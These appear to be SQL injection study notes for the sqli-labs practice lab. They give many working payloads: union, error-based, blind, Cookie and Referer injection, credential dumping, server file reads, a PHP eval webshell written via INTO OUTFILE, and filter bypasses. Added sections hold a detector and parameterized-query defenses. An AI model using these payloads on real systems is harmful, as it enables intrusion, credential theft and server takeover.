Classification
By request method: GET, POST
By SQL data type: integer injection, string injection
Other types: error-based injection, double injection (uses two SELECTs),
time-based blind injection, Cookie injection, User-Agent injection
[Blind injection]: time-based blind, boolean-based blind
Injection procedure
1. Determine whether injection is possible (whether input is not strictly validated) --> first element
1) Can changing a controllable parameter affect what the page displays?
2) Can the injected SQL produce an error --- database error messages reveal traces of the statement being run
(select username,password from user where id='?'#' limit 0,1)
3) Can the injected SQL run without error --- i.e. our input closes the original statement correctly
?id=1
2. What type of injection it is
3. Can the statement be maliciously modified --> second element
4. Can it execute successfully --> third element
5. Retrieve the wanted data
database -> table -> column -> value
information_schema,challenges,mysql,performance_schema,security,sys
emails,referers,uagents,users
# Find the number of columns: 1,2,3 are only placeholders
http://localhost/sqli-labs/Less-2/?id=4 union select 1,2,3 %23
---------------------------------------------------------------------------------------------------------------------------------
Integer injection
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,3 %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,user(),3 from information_schema.schemata %23
# List all databases
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata %23
# Current database
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,database(),3 from information_schema.schemata %23
# All tables in the current database
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
# All columns in the chosen table
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
# All data in those columns
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(concat_ws('——',username,password)),3 from security.users %23
String injection (single quote, double quote, parentheses)
http://localhost/sqli-labs/Less-1/?id=1' %23
http://localhost/sqli-labs/Less-1/?id=1' order by 3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,group_concat(concat_ws('——',id,username,password)),3 from security.users %23
http://localhost/sqli-labs/Less-4/?id=1" ) %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,database(),3 from information_schema.schemata %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-labs/Less-4/?id=-1" ) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
http://localhost/sqli-labs/Less-4/?id=-1" ) union select 1,group_concat(concat_ws('——',username,password)),3 from security.users %23
POST injection (login form)
Just close off the statement inside the login-form fields
Capture the request with Burp Suite (BP) and modify/resend it with Repeater
Error-based injection
Function reference:
extractvalue(): returns a string containing the queried value from the target XML
EXTRACTVALUE(XML_document,XPath_string);
First argument: XML_document, a string, the name of the XML document object (Doc in the reference)
Second argument: XPath_string (a string in XPath format)
concat: returns the string produced by concatenating its arguments
UPDATEXML(XML_document,Xpath_string,new_value);
First argument: XML_document, a string, the name of the XML document object (Doc in the reference)
Second argument: XPath_string (a string in XPath format); look up XPath syntax online if unfamiliar
Third argument: new_value, a string that replaces the data matched by the XPath
uname=' union select 1,extractvalue(1,concat(0x7e,(select version()))) %23&passwd=admin&submit=Submit
uname=' union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ) ) ) %23&passwd=admin&submit=Submit
uname=' union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()) ),1 ) %23&passwd=admin&submit=Submit
Double injection (the front end shows no output; database information has to be read from the error message)
uname=admin' union select 1,count(1) from information_schema.tables group by floor(rand()*2) %23&passwd=12345&submit=Submit
(count(1) counts rows, floor(rand()*2) yields either 0 or 1, group by does the grouping)
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version()) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1)) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from security.users limit 0,1)) %23&passwd=12345&submit=Submit
# The bare table name users also works
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from users limit 0,1)) %23&passwd=12345&submit=Submit
Boolean-based blind injection
http://localhost/sqli-labs/Less-5/?id=-1' or (select substr(version(),1,1) = 'a') %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select substr(version(),1,1) = '5') %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select 1 from information_schema.tables where table_schema =database() and substr(table_name,1,1)='a' limit 0,1) %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select 1 from information_schema.tables where table_schema =database() and substr(table_name,1,1)='u' limit 0,1) %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema =database() limit 0,1) =109 %23
# Capture with Burp and send to Intruder to brute-force the ASCII code
Time-based blind injection
http://localhost/sqli-labs/Less-9/?id=1' or if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema =database() limit 0,1)=101,sleep(2),0) %23
Cookie injection
Cookie: uname=admin' and 0 union select 1,2,3 %23
Cookie: uname=admin' and 0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database() %23
Cookie: uname=admin' and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema =database() and table_name='users' %23
Cookie: uname=admin' and 0 union select 1,group_concat(concat_ws(":",username,password)),3 from users %23
HTTP Referer injection
insert into xxx(a,b,c)values('' and extractvalue(1,concat(0x7e,@@version)) and ''','')
Referer: http://localhost/sqli-labs/Less-19/' and extractvalue(1,concat(0x7e,@@version)) and '
insert into xxx(a,b,c)values('' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) and '','')
' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() limit 0,1))) and '
' and extractvalue(1,concat(0x7e,(select group_concat(id) from emails ))) and '
Reading and writing files through SQL injection
load_file(file_name): reads the file and returns its contents as a string.
Prerequisites:
A. The database user must have the privilege to read, and the file must be fully readable
B. The file to read must be on the database server
C. The full path to the file must be given
D. The file must be smaller than max_allowed_packet
http://localhost/sqli-labs/Less-1/?id=1' order by 3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,load_file("index.php"),3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,load_file("d://boot.ini") %23
http://localhost/sqli-labs/Less-1/index.php/?id=-1' union select 1,2,load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php") %23
# Retrieve the source code
http://localhost/sqli-labs/Less-1/index.php/?id=-1' union select 1,2,hex(load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\index.php")) %23
http://localhost/sqli-labs/Less-7/?id=1')) order by 3 %23
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.txt" %23
# Write a webshell
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST[value]);?>" into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.txt" %23
# Bypassing comment-character filtering
select * from xx where id=''='' limit 0,1
http://localhost/sqli-labs/Less-23/?id=1'='
http://localhost/sqli-labs/Less-23/?id=1' or (extractvalue(1,concat(0x7e,version()))) or '
http://localhost/sqli-labs/Less-23/?id=1' or (extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))) or '
http://localhost/sqli-labs/Less-23/?id=-1' union select 1,version(),'
Bypassing and/or keyword filtering
http://localhost/sqli-labs/Less-25/?id=-1' union select 1,user(),3 %23
http://localhost/sqli-labs/Less-25/?id=-1' || 1%23
http://localhost/sqli-labs/Less-25/?id=-1' || (extractvalue(1,concat(0x7e,version()))) %23
Bypassing space filtering
%09 tab
%0a line feed (new line)
%0c form feed (new page)
%0d carriage return
%0b vertical tab
%a0 non-breaking space
/**/ in place of a space
http://localhost/sqli-labs/Less-26/?id=1' || (select%a01) || '
Inline-comment bypass
http://localhost/sqli-labs/Less-27/?id=1'%a0or%a01=1%a0or '
# Change letter case
http://localhost/sqli-labs/Less-27/?id=1'%a0UniOn%a0SelEct%a01,2'
# Keyword stripping (may need to be nested more than once)
http://localhost/sqli-labs/Less-27/?id=1'%a0ununionion%a0seselectlect%a01,2'
# Inline comments
http://localhost/sqli-labs/Less-27/?id=1'%a0/*!union*/%a0/*!SElect*/%a01,2'
Wide-byte injection
GBK encoding: 835c (the lead byte 0x83 followed by 0x5c, the backslash, is read as one GBK character)
http://localhost/sqli-labs/Less-32/?id=1%81' %23
http://localhost/sqli-labs/Less-32/?id=-1%81' union select 1,version(),3%23
http://localhost/sqli-labs/Less-32/?id=-1%81' union select 1,user(),3%23
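Why the escaped quote comes back to life under GBK, as an added illustration that is not part of the original notes: the addslashes() below is a minimal re-implementation of PHP-style byte-wise escaping (an assumption about the lab's escaping, not sqli-labs code), and the two inputs are the notes' own %81 and 0x83 lead bytes, URL-decoded; the "use UTF-8" defense listed further down is what makes the second column come out safe.

```python
def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP's addslashes()/magic_quotes_gpc:
    a backslash is put before every quote or backslash, with no knowledge of
    which bytes belong to multi-byte characters."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out.append(ord("\\"))
        out.append(b)
    return bytes(out)

def quote_survives_escaping(raw: bytes, charset: str) -> bool:
    """True if, after escaping, the server-side charset decodes the input to
    text that still ends in a bare (unescaped) single quote."""
    escaped = addslashes(raw)
    # errors="replace" mirrors a server that substitutes invalid bytes rather than failing.
    text = escaped.decode(charset, errors="replace")
    return text.endswith("'") and not text.endswith("\\'")

# Constructed samples: the notes' ?id=1%81' payload and the 0x83 lead byte of the "835c" pair,
# URL-decoded to the raw bytes the application would receive.
WIDE_BYTE_INPUTS = [b"1\x81'", b"1\x83'"]

def compare_charsets() -> dict[str, list[bool]]:
    """Per charset, whether each sample keeps a live quote after escaping.
    Under GBK the inserted backslash (0x5c) is swallowed as the trail byte of
    0x815c / 0x835c; under UTF-8 the stray lead byte is replaced and the
    backslash still escapes the quote."""
    return {cs: [quote_survives_escaping(s, cs) for s in WIDE_BYTE_INPUTS] for cs in ("gbk", "utf-8")}
```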
Bypassing function filtering (combined)
uname='=(select(1)from(admin)where(substr((passwd)from(30)))='cf')='&passwd=admin
# Use Burp to brute-force the string one character at a time
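A defender-side detector for the injection families and filter bypasses collected above, added here and not part of the original notes: it first undoes the bypasses (percent-decoding, %a0 and the other whitespace substitutes, /*!...*/ inline comments, case changes, doubled keywords such as ununionion), then matches the canonical forms; the signature names and the sample request are my own constructions.

```python
import re
from urllib.parse import unquote_to_bytes

# Keywords the notes show split or doubled ("ununionion", "seselectlect") to survive a one-pass filter.
KEYWORDS = ("union", "select", "extractvalue", "updatexml", "sleep", "load_file")
INLINE_COMMENT = re.compile(r"/\*!\s*(.*?)\s*\*/", re.S)       # MySQL runs what is inside /*!...*/
WS_SUBSTITUTES = re.compile(r"[\t\n\x0b\x0c\r\xa0]+|/\*\*/")   # %09 %0a %0b %0c %0d %a0 and /**/
SIGNATURES = {
    "union-based":       re.compile(r"\bunion\s+select\b"),
    "error-based":       re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "double-query":      re.compile(r"\bgroup\s+by\b.*\bfloor\s*\(\s*rand\s*\("),
    "boolean-blind":     re.compile(r"\b(substr|ascii)\s*\(.*\)\s*=\s*['\d]"),
    "time-blind":        re.compile(r"\bsleep\s*\("),
    "file-read-write":   re.compile(r"\b(load_file\s*\(|into\s+outfile\b)"),
    "logic-after-quote": re.compile(r"'\s*(\|\||\bor\b|\band\b)"),
    "wide-byte":         re.compile(r"[\x81-\xfe]'"),           # high byte glued to a quote (GBK trick)
}

def collapse_doubled(text: str) -> str:
    """ununionion -> union, seselectlect -> select; repeat until nothing changes."""
    changed = True
    while changed:
        changed = False
        for kw in KEYWORDS:
            for i in range(1, len(kw)):
                doubled = kw[:i] + kw + kw[i:]
                if doubled in text:
                    text, changed = text.replace(doubled, kw), True
    return text

def normalize(raw: str) -> str:
    """Undo the bypass tricks listed in the notes so the signatures see canonical SQL."""
    text = unquote_to_bytes(raw).decode("latin-1")   # byte-for-byte: %a0 -> \xa0, %81 -> \x81
    text = INLINE_COMMENT.sub(r"\1", text)
    text = WS_SUBSTITUTES.sub(" ", text)
    return collapse_doubled(text.lower())

def classify(raw: str) -> list[str]:
    """Names of the injection families whose signature matches the normalized value."""
    text = normalize(raw)
    return [name for name, sig in SIGNATURES.items() if sig.search(text)]

def scan_request(fields: dict[str, str]) -> dict[str, list[str]]:
    """classify() every user-controlled field (query string, Cookie, Referer, User-Agent, ...)."""
    return {field: hits for field, value in fields.items() if (hits := classify(value))}

# Constructed sample request modelled on the notes' Cookie and Referer payloads (not a real capture).
SAMPLE = {
    "query": "id=1",
    "cookie": "uname=admin' and 0 union select 1,2,3 %23",
    "referer": "http://localhost/sqli-labs/Less-19/' and extractvalue(1,concat(0x7e,@@version)) and '",
}
```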
SQL injection defenses
Code layer:
Blacklist
Whitelist
Sensitive-character filtering
Use the framework's safe queries (parameterized queries)
Standardize output
Configuration layer
Enable GPC (magic_quotes_gpc)
Use UTF-8
Physical layer
WAF
Database auditing
Cloud protection
IPS (intrusion prevention system)
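The code-layer defenses side by side, as an added example that is not from the original notes: a Less-1 style string-concatenated lookup next to its parameterized form and an integer whitelist, run against an in-memory SQLite stand-in for security.users with fake rows (SQLite's comment marker is --, unlike MySQL's #).

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for sqli-labs' security.users (fake rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(id integer, username text, password text)")
    conn.executemany("insert into users values (?,?,?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")])
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Less-1 style: the parameter is spliced into the quoted SQL, so a quote in it
    closes the literal and the rest of the input is executed as SQL."""
    sql = f"select id, username from users where id='{user_id}' limit 0,1"
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """The framework-safe form: the value is bound, so it is never parsed as SQL."""
    return conn.execute("select id, username from users where id=? limit 0,1", (user_id,)).fetchall()

def lookup_whitelisted(conn: sqlite3.Connection, user_id: str):
    """Whitelist for the integer case: only a plain number reaches the query;
    None means the request was rejected before touching the database."""
    if not user_id.isdigit():
        return None
    return lookup_parameterized(conn, user_id)
```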